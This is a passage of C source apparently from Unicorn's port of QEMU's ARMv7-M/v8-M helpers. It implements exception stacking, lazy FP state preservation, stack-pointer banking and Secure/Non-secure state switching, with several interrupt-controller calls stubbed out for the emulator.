BFSR.STKERR\n"); env->v7m.cfsr[M_REG_NS] |= R_V7M_CFSR_STKERR_MASK; } // exc = ARMV7M_EXCP_BUS; // exc_secure = false; goto pend_fault; } return true; pend_fault: /* * By 
pending the exception at this point we are making * the IMPDEF choice "overridden exceptions pended" (see the * MergeExcInfo() pseudocode). The other choice would be to not * pend them now and then make a choice about which to throw away * later if we have two derived exceptions. * The only case when we must not pend the exception but instead * throw it away is if we are doing the push of the callee registers * and we've already generated a derived exception (this is indicated * by the caller passing STACK_IGNFAULTS). Even in this case we will * still update the fault status registers. */ switch (mode) { case STACK_NORMAL: // armv7m_nvic_set_pending_derived(env->nvic, exc, exc_secure); break; case STACK_LAZYFP: // armv7m_nvic_set_pending_lazyfp(env->nvic, exc, exc_secure); break; case STACK_IGNFAULTS: break; } return false; } void armv7m_nvic_set_pending(void *opaque, int irq, bool secure) { } static bool v7m_stack_read(ARMCPU *cpu, uint32_t *dest, uint32_t addr, ARMMMUIdx mmu_idx) { CPUState *cs = CPU(cpu); CPUARMState *env = &cpu->env; MemTxAttrs attrs = { 0 }; MemTxResult txres; target_ulong page_size; hwaddr physaddr; int prot; ARMMMUFaultInfo fi = { 0 }; bool secure = mmu_idx & ARM_MMU_IDX_M_S; int exc; bool exc_secure; uint32_t value; if (get_phys_addr(env, addr, MMU_DATA_LOAD, mmu_idx, &physaddr, &attrs, &prot, &page_size, &fi, NULL)) { /* MPU/SAU lookup failed */ if (fi.type == ARMFault_QEMU_SFault) { qemu_log_mask(CPU_LOG_INT, "...SecureFault with SFSR.AUVIOL during unstack\n"); env->v7m.sfsr |= R_V7M_SFSR_AUVIOL_MASK | R_V7M_SFSR_SFARVALID_MASK; env->v7m.sfar = addr; exc = ARMV7M_EXCP_SECURE; exc_secure = false; } else { qemu_log_mask(CPU_LOG_INT, "...MemManageFault with CFSR.MUNSTKERR\n"); env->v7m.cfsr[secure] |= R_V7M_CFSR_MUNSTKERR_MASK; exc = ARMV7M_EXCP_MEM; exc_secure = secure; } goto pend_fault; } #ifdef UNICORN_ARCH_POSTFIX value = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->uc, arm_addressspace(cs, attrs), physaddr, #else value = address_space_ldl(cs->uc, arm_addressspace(cs, attrs), physaddr, #endif attrs, &txres); if (txres != MEMTX_OK) { /* BusFault trying to read the data */ qemu_log_mask(CPU_LOG_INT, "...BusFault with BFSR.UNSTKERR\n"); env->v7m.cfsr[M_REG_NS] |= R_V7M_CFSR_UNSTKERR_MASK; exc = ARMV7M_EXCP_BUS; exc_secure = false; goto pend_fault; } *dest = value; return true; pend_fault: /* * By pending the exception at this point we are making * the IMPDEF choice "overridden exceptions pended" (see the * MergeExcInfo() pseudocode). The other choice would be to not * pend them now and then make a choice about which to throw away * later if we have two derived exceptions. */ armv7m_nvic_set_pending(env->nvic, exc, exc_secure); return false; } void HELPER(v7m_preserve_fp_state)(CPUARMState *env) { /* * Preserve FP state (because LSPACT was set and we are about * to execute an FP instruction). This corresponds to the * PreserveFPState() pseudocode. * We may throw an exception if the stacking fails. 
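 *
 * In other words, this is the lazy-FP path: LSPACT was left set at
 * exception entry instead of the FP registers being stacked then; the
 * stores to the frame address recorded in FPCAR happen only now, on
 * the first FP instruction executed since.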
*/ ARMCPU *cpu = env_archcpu(env); bool is_secure = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_S_MASK; bool negpri = !(env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_HFRDY_MASK); bool is_priv = !(env->v7m.fpccr[is_secure] & R_V7M_FPCCR_USER_MASK); bool splimviol = env->v7m.fpccr[is_secure] & R_V7M_FPCCR_SPLIMVIOL_MASK; uint32_t fpcar = env->v7m.fpcar[is_secure]; bool stacked_ok = true; bool ts = is_secure && (env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_TS_MASK); bool take_exception; /* Check the background context had access to the FPU */ if (!v7m_cpacr_pass(env, is_secure, is_priv)) { // armv7m_nvic_set_pending_lazyfp(env->nvic, ARMV7M_EXCP_USAGE, is_secure); env->v7m.cfsr[is_secure] |= R_V7M_CFSR_NOCP_MASK; stacked_ok = false; } else if (!is_secure && !extract32(env->v7m.nsacr, 10, 1)) { // armv7m_nvic_set_pending_lazyfp(env->nvic, ARMV7M_EXCP_USAGE, M_REG_S); env->v7m.cfsr[M_REG_S] |= R_V7M_CFSR_NOCP_MASK; stacked_ok = false; } if (!splimviol && stacked_ok) { /* We only stack if the stack limit wasn't violated */ int i; ARMMMUIdx mmu_idx; mmu_idx = arm_v7m_mmu_idx_all(env, is_secure, is_priv, negpri); for (i = 0; i < (ts ? 32 : 16); i += 2) { uint64_t dn = *aa32_vfp_dreg(env, i / 2); uint32_t faddr = fpcar + 4 * i; uint32_t slo = extract64(dn, 0, 32); uint32_t shi = extract64(dn, 32, 32); if (i >= 16) { faddr += 8; /* skip the slot for the FPSCR */ } stacked_ok = stacked_ok && v7m_stack_write(cpu, faddr, slo, mmu_idx, STACK_LAZYFP) && v7m_stack_write(cpu, faddr + 4, shi, mmu_idx, STACK_LAZYFP); } stacked_ok = stacked_ok && v7m_stack_write(cpu, fpcar + 0x40, vfp_get_fpscr(env), mmu_idx, STACK_LAZYFP); } /* * We definitely pended an exception, but it's possible that it * might not be able to be taken now. If its priority permits us * to take it now, then we must not update the LSPACT or FP regs, * but instead jump out to take the exception immediately. * If it's just pending and won't be taken until the current * handler exits, then we do update LSPACT and the FP regs. */ // take_exception = !stacked_ok && // armv7m_nvic_can_take_pending_exception(env->nvic); /* consider armv7m_nvic_can_take_pending_exception() always return false. in unicorn */ take_exception = false; if (take_exception) { raise_exception_ra(env, EXCP_LAZYFP, 0, 1, GETPC()); } env->v7m.fpccr[is_secure] &= ~R_V7M_FPCCR_LSPACT_MASK; if (ts) { /* Clear s0 to s31 and the FPSCR */ int i; for (i = 0; i < 32; i += 2) { *aa32_vfp_dreg(env, i / 2) = 0; } vfp_set_fpscr(env, 0); } /* * Otherwise s0 to s15 and FPSCR are UNKNOWN; we choose to leave them * unchanged. */ } /* * Write to v7M CONTROL.SPSEL bit for the specified security bank. * This may change the current stack pointer between Main and Process * stack pointers if it is done for the CONTROL register for the current * security state. */ static void write_v7m_control_spsel_for_secstate(CPUARMState *env, bool new_spsel, bool secstate) { bool old_is_psp = v7m_using_psp(env); env->v7m.control[secstate] = deposit32(env->v7m.control[secstate], R_V7M_CONTROL_SPSEL_SHIFT, R_V7M_CONTROL_SPSEL_LENGTH, new_spsel); if (secstate == env->v7m.secure) { bool new_is_psp = v7m_using_psp(env); uint32_t tmp; if (old_is_psp != new_is_psp) { tmp = env->v7m.other_sp; env->v7m.other_sp = env->regs[13]; env->regs[13] = tmp; } } } /* * Write to v7M CONTROL.SPSEL bit. This may change the current * stack pointer between Main and Process stack pointers. 
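*/

/*
 * Added illustration (hypothetical helper, not upstream code): selecting
 * PSP in thread mode via the banked write above must be observable
 * through v7m_using_psp().
 */
static void spsel_select_psp_sketch(CPUARMState *env)
{
    write_v7m_control_spsel_for_secstate(env, true, env->v7m.secure);
    g_assert(arm_v7m_is_handler_mode(env) || v7m_using_psp(env));
}

/* SPSEL write for the current security state: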
*/ static void write_v7m_control_spsel(CPUARMState *env, bool new_spsel) { write_v7m_control_spsel_for_secstate(env, new_spsel, env->v7m.secure); } void write_v7m_exception(CPUARMState *env, uint32_t new_exc) { /* * Write a new value to v7m.exception, thus transitioning into or out * of Handler mode; this may result in a change of active stack pointer. */ bool new_is_psp, old_is_psp = v7m_using_psp(env); uint32_t tmp; env->v7m.exception = new_exc; new_is_psp = v7m_using_psp(env); if (old_is_psp != new_is_psp) { tmp = env->v7m.other_sp; env->v7m.other_sp = env->regs[13]; env->regs[13] = tmp; } } /* Switch M profile security state between NS and S */ static void switch_v7m_security_state(CPUARMState *env, bool new_secstate) { uint32_t new_ss_msp, new_ss_psp; if (env->v7m.secure == new_secstate) { return; } /* * All the banked state is accessed by looking at env->v7m.secure * except for the stack pointer; rearrange the SP appropriately. */ new_ss_msp = env->v7m.other_ss_msp; new_ss_psp = env->v7m.other_ss_psp; if (v7m_using_psp(env)) { env->v7m.other_ss_psp = env->regs[13]; env->v7m.other_ss_msp = env->v7m.other_sp; } else { env->v7m.other_ss_msp = env->regs[13]; env->v7m.other_ss_psp = env->v7m.other_sp; } env->v7m.secure = new_secstate; if (v7m_using_psp(env)) { env->regs[13] = new_ss_psp; env->v7m.other_sp = new_ss_msp; } else { env->regs[13] = new_ss_msp; env->v7m.other_sp = new_ss_psp; } } void HELPER(v7m_bxns)(CPUARMState *env, uint32_t dest) { /* * Handle v7M BXNS: * - if the return value is a magic value, do exception return (like BX) * - otherwise bit 0 of the return value is the target security state */ uint32_t min_magic; if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { /* Covers FNC_RETURN and EXC_RETURN magic */ min_magic = FNC_RETURN_MIN_MAGIC; } else { /* EXC_RETURN magic only */ min_magic = EXC_RETURN_MIN_MAGIC; } if (dest >= min_magic) { /* * This is an exception return magic value; put it where * do_v7m_exception_exit() expects and raise EXCEPTION_EXIT. * Note that if we ever add gen_ss_advance() singlestep support to * M profile this should count as an "instruction execution complete" * event (compare gen_bx_excret_final_code()). */ env->regs[15] = dest & ~1; env->thumb = dest & 1; HELPER(exception_internal)(env, EXCP_EXCEPTION_EXIT); /* notreached */ } /* translate.c should have made BXNS UNDEF unless we're secure */ assert(env->v7m.secure); if (!(dest & 1)) { env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_SFPA_MASK; } switch_v7m_security_state(env, dest & 1); env->thumb = 1; env->regs[15] = dest & ~1; arm_rebuild_hflags(env); } void HELPER(v7m_blxns)(CPUARMState *env, uint32_t dest) { /* * Handle v7M BLXNS: * - bit 0 of the destination address is the target security state */ /* At this point regs[15] is the address just after the BLXNS */ uint32_t nextinst = env->regs[15] | 1; uint32_t sp = env->regs[13] - 8; uint32_t saved_psr; /* translate.c will have made BLXNS UNDEF unless we're secure */ assert(env->v7m.secure); if (dest & 1) { /* * Target is Secure, so this is just a normal BLX, * except that the low bit doesn't indicate Thumb/not. 
*/ env->regs[14] = nextinst; env->thumb = 1; env->regs[15] = dest & ~1; return; } /* Target is non-secure: first push a stack frame */ if (!QEMU_IS_ALIGNED(sp, 8)) { qemu_log_mask(LOG_GUEST_ERROR, "BLXNS with misaligned SP is UNPREDICTABLE\n"); } if (sp < v7m_sp_limit(env)) { raise_exception(env, EXCP_STKOF, 0, 1); } saved_psr = env->v7m.exception; if (env->v7m.control[M_REG_S] & R_V7M_CONTROL_SFPA_MASK) { saved_psr |= XPSR_SFPA; } /* Note that these stores can throw exceptions on MPU faults */ cpu_stl_data_ra(env, sp, nextinst, GETPC()); cpu_stl_data_ra(env, sp + 4, saved_psr, GETPC()); env->regs[13] = sp; env->regs[14] = 0xfeffffff; if (arm_v7m_is_handler_mode(env)) { /* * Write a dummy value to IPSR, to avoid leaking the current secure * exception number to non-secure code. This is guaranteed not * to cause write_v7m_exception() to actually change stacks. */ write_v7m_exception(env, 1); } env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_SFPA_MASK; switch_v7m_security_state(env, 0); env->thumb = 1; env->regs[15] = dest; arm_rebuild_hflags(env); } static uint32_t *get_v7m_sp_ptr(CPUARMState *env, bool secure, bool threadmode, bool spsel) { /* * Return a pointer to the location where we currently store the * stack pointer for the requested security state and thread mode. * This pointer will become invalid if the CPU state is updated * such that the stack pointers are switched around (eg changing * the SPSEL control bit). * Compare the v8M ARM ARM pseudocode LookUpSP_with_security_mode(). * Unlike that pseudocode, we require the caller to pass us in the * SPSEL control bit value; this is because we also use this * function in handling of pushing of the callee-saves registers * part of the v8M stack frame (pseudocode PushCalleeStack()), * and in the tailchain codepath the SPSEL bit comes from the exception * return magic LR value from the previous exception. The pseudocode * opencodes the stack-selection in PushCalleeStack(), but we prefer * to make this utility function generic enough to do the job. */ bool want_psp = threadmode && spsel; if (secure == env->v7m.secure) { if (want_psp == v7m_using_psp(env)) { return &env->regs[13]; } else { return &env->v7m.other_sp; } } else { if (want_psp) { return &env->v7m.other_ss_psp; } else { return &env->v7m.other_ss_msp; } } } #if 0 static bool arm_v7m_load_vector(ARMCPU *cpu, int exc, bool targets_secure, uint32_t *pvec) { CPUState *cs = CPU(cpu); CPUARMState *env = &cpu->env; MemTxResult result; uint32_t addr = env->v7m.vecbase[targets_secure] + exc * 4; uint32_t vector_entry; MemTxAttrs attrs = { 0 }; ARMMMUIdx mmu_idx; // bool exc_secure; mmu_idx = arm_v7m_mmu_idx_for_secstate_and_priv(env, targets_secure, true); /* * We don't do a get_phys_addr() here because the rules for vector * loads are special: they always use the default memory map, and * the default memory map permits reads from all addresses. * Since there's no easy way to pass through to pmsav8_mpu_lookup() * that we want this special case which would always say "yes", * we just do the SAU lookup here followed by a direct physical load. */ attrs.secure = targets_secure; attrs.user = false; if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { V8M_SAttributes sattrs = { 0 }; v8m_security_lookup(env, addr, MMU_DATA_LOAD, mmu_idx, &sattrs); if (sattrs.ns) { attrs.secure = false; } else if (!targets_secure) { /* * NS access to S memory: the underlying exception which we escalate * to HardFault is SecureFault, which always targets Secure. 
*/ // exc_secure = true; goto load_fail; } } #ifdef UNICORN_ARCH_POSTFIX vector_entry = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->uc, arm_addressspace(cs, attrs), addr, #else vector_entry = address_space_ldl(cs->uc, arm_addressspace(cs, attrs), addr, #endif attrs, &result); if (result != MEMTX_OK) { /* * Underlying exception is BusFault: its target security state * depends on BFHFNMINS. */ // exc_secure = !(cpu->env.v7m.aircr & R_V7M_AIRCR_BFHFNMINS_MASK); goto load_fail; } *pvec = vector_entry; return true; load_fail: /* * All vector table fetch fails are reported as HardFault, with * HFSR.VECTTBL and .FORCED set. (FORCED is set because * technically the underlying exception is a SecureFault or BusFault * that is escalated to HardFault.) This is a terminal exception, * so we will either take the HardFault immediately or else enter * lockup (the latter case is handled in armv7m_nvic_set_pending_derived()). * The HardFault is Secure if BFHFNMINS is 0 (meaning that all HFs are * secure); otherwise it targets the same security state as the * underlying exception. */ if (!(cpu->env.v7m.aircr & R_V7M_AIRCR_BFHFNMINS_MASK)) { // exc_secure = true; } env->v7m.hfsr |= R_V7M_HFSR_VECTTBL_MASK | R_V7M_HFSR_FORCED_MASK; // armv7m_nvic_set_pending_derived(env->nvic, ARMV7M_EXCP_HARD, exc_secure); return false; } #endif static uint32_t v7m_integrity_sig(CPUARMState *env, uint32_t lr) { /* * Return the integrity signature value for the callee-saves * stack frame section. @lr is the exception return payload/LR value * whose FType bit forms bit 0 of the signature if FP is present. */ uint32_t sig = 0xfefa125a; if (!cpu_isar_feature(aa32_vfp_simd, env_archcpu(env)) || (lr & R_V7M_EXCRET_FTYPE_MASK)) { sig |= 1; } return sig; } #if 0 static bool v7m_push_callee_stack(ARMCPU *cpu, uint32_t lr, bool dotailchain, bool ignore_faults) { /* * For v8M, push the callee-saves register part of the stack frame. * Compare the v8M pseudocode PushCalleeStack(). * In the tailchaining case this may not be the current stack. */ CPUARMState *env = &cpu->env; uint32_t *frame_sp_p; uint32_t frameptr; ARMMMUIdx mmu_idx; bool stacked_ok; uint32_t limit; bool want_psp; uint32_t sig; StackingMode smode = ignore_faults ? STACK_IGNFAULTS : STACK_NORMAL; if (dotailchain) { bool mode = lr & R_V7M_EXCRET_MODE_MASK; bool priv = !(env->v7m.control[M_REG_S] & R_V7M_CONTROL_NPRIV_MASK) || !mode; mmu_idx = arm_v7m_mmu_idx_for_secstate_and_priv(env, M_REG_S, priv); frame_sp_p = get_v7m_sp_ptr(env, M_REG_S, mode, lr & R_V7M_EXCRET_SPSEL_MASK); want_psp = mode && (lr & R_V7M_EXCRET_SPSEL_MASK); if (want_psp) { limit = env->v7m.psplim[M_REG_S]; } else { limit = env->v7m.msplim[M_REG_S]; } } else { mmu_idx = arm_mmu_idx(env); frame_sp_p = &env->regs[13]; limit = v7m_sp_limit(env); } frameptr = *frame_sp_p - 0x28; if (frameptr < limit) { /* * Stack limit failure: set SP to the limit value, and generate * STKOF UsageFault. Stack pushes below the limit must not be * performed. It is IMPDEF whether pushes above the limit are * performed; we choose not to. */ qemu_log_mask(CPU_LOG_INT, "...STKOF during callee-saves register stacking\n"); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_STKOF_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); *frame_sp_p = limit; return true; } /* * Write as much of the stack frame as we can. A write failure may * cause us to pend a derived exception. 
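 *
 * The first word written below is the integrity signature (0xfefa125a,
 * with bit 0 reflecting FType); the exception-return unstacking code
 * checks it to detect attempts to fake or corrupt a secure
 * callee-saves frame.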
*/ sig = v7m_integrity_sig(env, lr); stacked_ok = v7m_stack_write(cpu, frameptr, sig, mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x8, env->regs[4], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0xc, env->regs[5], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x10, env->regs[6], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x14, env->regs[7], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x18, env->regs[8], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x1c, env->regs[9], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x20, env->regs[10], mmu_idx, smode) && v7m_stack_write(cpu, frameptr + 0x24, env->regs[11], mmu_idx, smode); /* Update SP regardless of whether any of the stack accesses failed. */ *frame_sp_p = frameptr; return !stacked_ok; } #endif static void v7m_exception_taken(ARMCPU *cpu, uint32_t lr, bool dotailchain, bool ignore_stackfaults) { return; // FIXME #if 0 /* * Do the "take the exception" parts of exception entry, * but not the pushing of state to the stack. This is * similar to the pseudocode ExceptionTaken() function. */ CPUARMState *env = &cpu->env; uint32_t addr; bool targets_secure; int exc; bool push_failed = false; armv7m_nvic_get_pending_irq_info(env->nvic, &exc, &targets_secure); qemu_log_mask(CPU_LOG_INT, "...taking pending %s exception %d\n", targets_secure ? "secure" : "nonsecure", exc); if (dotailchain) { /* Sanitize LR FType and PREFIX bits */ if (!cpu_isar_feature(aa32_vfp_simd, cpu)) { lr |= R_V7M_EXCRET_FTYPE_MASK; } lr = deposit32(lr, 24, 8, 0xff); } if (arm_feature(env, ARM_FEATURE_V8)) { if (arm_feature(env, ARM_FEATURE_M_SECURITY) && (lr & R_V7M_EXCRET_S_MASK)) { /* * The background code (the owner of the registers in the * exception frame) is Secure. This means it may either already * have or now needs to push callee-saves registers. */ if (targets_secure) { if (dotailchain && !(lr & R_V7M_EXCRET_ES_MASK)) { /* * We took an exception from Secure to NonSecure * (which means the callee-saved registers got stacked) * and are now tailchaining to a Secure exception. * Clear DCRS so eventual return from this Secure * exception unstacks the callee-saved registers. */ lr &= ~R_V7M_EXCRET_DCRS_MASK; } } else { /* * We're going to a non-secure exception; push the * callee-saves registers to the stack now, if they're * not already saved. */ if (lr & R_V7M_EXCRET_DCRS_MASK && !(dotailchain && !(lr & R_V7M_EXCRET_ES_MASK))) { push_failed = v7m_push_callee_stack(cpu, lr, dotailchain, ignore_stackfaults); } lr |= R_V7M_EXCRET_DCRS_MASK; } } lr &= ~R_V7M_EXCRET_ES_MASK; if (targets_secure || !arm_feature(env, ARM_FEATURE_M_SECURITY)) { lr |= R_V7M_EXCRET_ES_MASK; } lr &= ~R_V7M_EXCRET_SPSEL_MASK; if (env->v7m.control[targets_secure] & R_V7M_CONTROL_SPSEL_MASK) { lr |= R_V7M_EXCRET_SPSEL_MASK; } /* * Clear registers if necessary to prevent non-secure exception * code being able to see register values from secure code. * Where register values become architecturally UNKNOWN we leave * them with their previous values. */ if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { if (!targets_secure) { /* * Always clear the caller-saved registers (they have been * pushed to the stack earlier in v7m_push_stack()). * Clear callee-saved registers if the background code is * Secure (in which case these regs were saved in * v7m_push_callee_stack()). 
*/ int i; for (i = 0; i < 13; i++) { /* r4..r11 are callee-saves, zero only if EXCRET.S == 1 */ if (i < 4 || i > 11 || (lr & R_V7M_EXCRET_S_MASK)) { env->regs[i] = 0; } } /* Clear EAPSR */ xpsr_write(env, 0, XPSR_NZCV | XPSR_Q | XPSR_GE | XPSR_IT); } } } if (push_failed && !ignore_stackfaults) { /* * Derived exception on callee-saves register stacking: * we might now want to take a different exception which * targets a different security state, so try again from the top. */ qemu_log_mask(CPU_LOG_INT, "...derived exception on callee-saves register stacking"); v7m_exception_taken(cpu, lr, true, true); return; } if (!arm_v7m_load_vector(cpu, exc, targets_secure, &addr)) { /* Vector load failed: derived exception */ qemu_log_mask(CPU_LOG_INT, "...derived exception on vector table load"); v7m_exception_taken(cpu, lr, true, true); return; } /* * Now we've done everything that might cause a derived exception * we can go ahead and activate whichever exception we're going to * take (which might now be the derived exception). */ armv7m_nvic_acknowledge_irq(env->nvic); /* Switch to target security state -- must do this before writing SPSEL */ switch_v7m_security_state(env, targets_secure); write_v7m_control_spsel(env, 0); arm_clear_exclusive(env); /* Clear SFPA and FPCA (has no effect if no FPU) */ env->v7m.control[M_REG_S] &= ~(R_V7M_CONTROL_FPCA_MASK | R_V7M_CONTROL_SFPA_MASK); /* Clear IT bits */ env->condexec_bits = 0; env->regs[14] = lr; env->regs[15] = addr & 0xfffffffe; env->thumb = addr & 1; arm_rebuild_hflags(env); #endif } bool armv7m_nvic_neg_prio_requested(void *opaque, bool secure) { return false; } static void v7m_update_fpccr(CPUARMState *env, uint32_t frameptr, bool apply_splim) { #if 0 /* * Like the pseudocode UpdateFPCCR: save state in FPCAR and FPCCR * that we will need later in order to do lazy FP reg stacking. */ bool is_secure = env->v7m.secure; void *nvic = env->nvic; /* * Some bits are unbanked and live always in fpccr[M_REG_S]; some bits * are banked and we want to update the bit in the bank for the * current security state; and in one case we want to specifically * update the NS banked version of a bit even if we are secure. 
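     *
     * Concretely, in the code below: LSPACT, SPLIMVIOL, USER, THREAD
     * and MMRDY go via *fpccr (the current security state's bank);
     * S, HFRDY, BFRDY, MONRDY, SFRDY and the Secure UFRDY go via
     * *fpccr_s; and the NS UFRDY is the one case written via
     * *fpccr_ns even when we are Secure.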
*/ uint32_t *fpccr_s = &env->v7m.fpccr[M_REG_S]; uint32_t *fpccr_ns = &env->v7m.fpccr[M_REG_NS]; uint32_t *fpccr = &env->v7m.fpccr[is_secure]; bool hfrdy, bfrdy, mmrdy, ns_ufrdy, s_ufrdy, sfrdy, monrdy; env->v7m.fpcar[is_secure] = frameptr & ~0x7; if (apply_splim && arm_feature(env, ARM_FEATURE_V8)) { bool splimviol; uint32_t splim = v7m_sp_limit(env); bool ign = armv7m_nvic_neg_prio_requested(nvic, is_secure) && (env->v7m.ccr[is_secure] & R_V7M_CCR_STKOFHFNMIGN_MASK); splimviol = !ign && frameptr < splim; *fpccr = FIELD_DP32(*fpccr, V7M_FPCCR, SPLIMVIOL, splimviol); } *fpccr = FIELD_DP32(*fpccr, V7M_FPCCR, LSPACT, 1); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, S, is_secure); *fpccr = FIELD_DP32(*fpccr, V7M_FPCCR, USER, arm_current_el(env) == 0); *fpccr = FIELD_DP32(*fpccr, V7M_FPCCR, THREAD, !arm_v7m_is_handler_mode(env)); hfrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_HARD, false); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, HFRDY, hfrdy); bfrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_BUS, false); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, BFRDY, bfrdy); mmrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_MEM, is_secure); *fpccr = FIELD_DP32(*fpccr, V7M_FPCCR, MMRDY, mmrdy); ns_ufrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_USAGE, false); *fpccr_ns = FIELD_DP32(*fpccr_ns, V7M_FPCCR, UFRDY, ns_ufrdy); monrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_DEBUG, false); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, MONRDY, monrdy); if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { s_ufrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_USAGE, true); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, UFRDY, s_ufrdy); sfrdy = armv7m_nvic_get_ready_status(nvic, ARMV7M_EXCP_SECURE, false); *fpccr_s = FIELD_DP32(*fpccr_s, V7M_FPCCR, SFRDY, sfrdy); } #endif } void HELPER(v7m_vlstm)(CPUARMState *env, uint32_t fptr) { /* fptr is the value of Rn, the frame pointer we store the FP regs to */ bool s = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_S_MASK; bool lspact = env->v7m.fpccr[s] & R_V7M_FPCCR_LSPACT_MASK; uintptr_t ra = GETPC(); assert(env->v7m.secure); if (!(env->v7m.control[M_REG_S] & R_V7M_CONTROL_SFPA_MASK)) { return; } /* Check access to the coprocessor is permitted */ if (!v7m_cpacr_pass(env, true, arm_current_el(env) != 0)) { raise_exception_ra(env, EXCP_NOCP, 0, 1, GETPC()); } if (lspact) { /* LSPACT should not be active when there is active FP state */ raise_exception_ra(env, EXCP_LSERR, 0, 1, GETPC()); } if (fptr & 7) { raise_exception_ra(env, EXCP_UNALIGNED, 0, 1, GETPC()); } /* * Note that we do not use v7m_stack_write() here, because the * accesses should not set the FSR bits for stacking errors if they * fail. (In pseudocode terms, they are AccType_NORMAL, not AccType_STACK * or AccType_LAZYFP). Faults in cpu_stl_data_ra() will throw exceptions * and longjmp out. */ if (!(env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_LSPEN_MASK)) { bool ts = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_TS_MASK; int i; for (i = 0; i < (ts ? 32 : 16); i += 2) { uint64_t dn = *aa32_vfp_dreg(env, i / 2); uint32_t faddr = fptr + 4 * i; uint32_t slo = extract64(dn, 0, 32); uint32_t shi = extract64(dn, 32, 32); if (i >= 16) { faddr += 8; /* skip the slot for the FPSCR */ } cpu_stl_data_ra(env, faddr, slo, ra); cpu_stl_data_ra(env, faddr + 4, shi, ra); } cpu_stl_data_ra(env, fptr + 0x40, vfp_get_fpscr(env), ra); /* * If TS is 0 then s0 to s15 and FPSCR are UNKNOWN; we choose to * leave them unchanged, matching our choice in v7m_preserve_fp_state. 
*/ if (ts) { for (i = 0; i < 32; i += 2) { *aa32_vfp_dreg(env, i / 2) = 0; } vfp_set_fpscr(env, 0); } } else { v7m_update_fpccr(env, fptr, false); } env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_FPCA_MASK; } void HELPER(v7m_vlldm)(CPUARMState *env, uint32_t fptr) { uintptr_t ra = GETPC(); /* fptr is the value of Rn, the frame pointer we load the FP regs from */ assert(env->v7m.secure); if (!(env->v7m.control[M_REG_S] & R_V7M_CONTROL_SFPA_MASK)) { return; } /* Check access to the coprocessor is permitted */ if (!v7m_cpacr_pass(env, true, arm_current_el(env) != 0)) { raise_exception_ra(env, EXCP_NOCP, 0, 1, GETPC()); } if (env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_LSPACT_MASK) { /* State in FP is still valid */ env->v7m.fpccr[M_REG_S] &= ~R_V7M_FPCCR_LSPACT_MASK; } else { bool ts = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_TS_MASK; int i; uint32_t fpscr; if (fptr & 7) { raise_exception_ra(env, EXCP_UNALIGNED, 0, 1, GETPC()); } for (i = 0; i < (ts ? 32 : 16); i += 2) { uint32_t slo, shi; uint64_t dn; uint32_t faddr = fptr + 4 * i; if (i >= 16) { faddr += 8; /* skip the slot for the FPSCR */ } slo = cpu_ldl_data_ra(env, faddr, ra); shi = cpu_ldl_data_ra(env, faddr + 4, ra); dn = (uint64_t) shi << 32 | slo; *aa32_vfp_dreg(env, i / 2) = dn; } fpscr = cpu_ldl_data_ra(env, fptr + 0x40, ra); vfp_set_fpscr(env, fpscr); } env->v7m.control[M_REG_S] |= R_V7M_CONTROL_FPCA_MASK; } static bool v7m_push_stack(ARMCPU *cpu) { /* * Do the "set up stack frame" part of exception entry, * similar to pseudocode PushStack(). * Return true if we generate a derived exception (and so * should ignore further stack faults trying to process * that derived exception.) */ bool stacked_ok = true, limitviol = false; CPUARMState *env = &cpu->env; uint32_t xpsr = xpsr_read(env); uint32_t frameptr = env->regs[13]; ARMMMUIdx mmu_idx = arm_mmu_idx(env); uint32_t framesize; bool nsacr_cp10 = extract32(env->v7m.nsacr, 10, 1); if ((env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK) && (env->v7m.secure || nsacr_cp10)) { if (env->v7m.secure && env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_TS_MASK) { framesize = 0xa8; } else { framesize = 0x68; } } else { framesize = 0x20; } /* Align stack pointer if the guest wants that */ if ((frameptr & 4) && (env->v7m.ccr[env->v7m.secure] & R_V7M_CCR_STKALIGN_MASK)) { frameptr -= 4; xpsr |= XPSR_SPREALIGN; } xpsr &= ~XPSR_SFPA; if (env->v7m.secure && (env->v7m.control[M_REG_S] & R_V7M_CONTROL_SFPA_MASK)) { xpsr |= XPSR_SFPA; } frameptr -= framesize; if (arm_feature(env, ARM_FEATURE_V8)) { uint32_t limit = v7m_sp_limit(env); if (frameptr < limit) { /* * Stack limit failure: set SP to the limit value, and generate * STKOF UsageFault. Stack pushes below the limit must not be * performed. It is IMPDEF whether pushes above the limit are * performed; we choose not to. */ 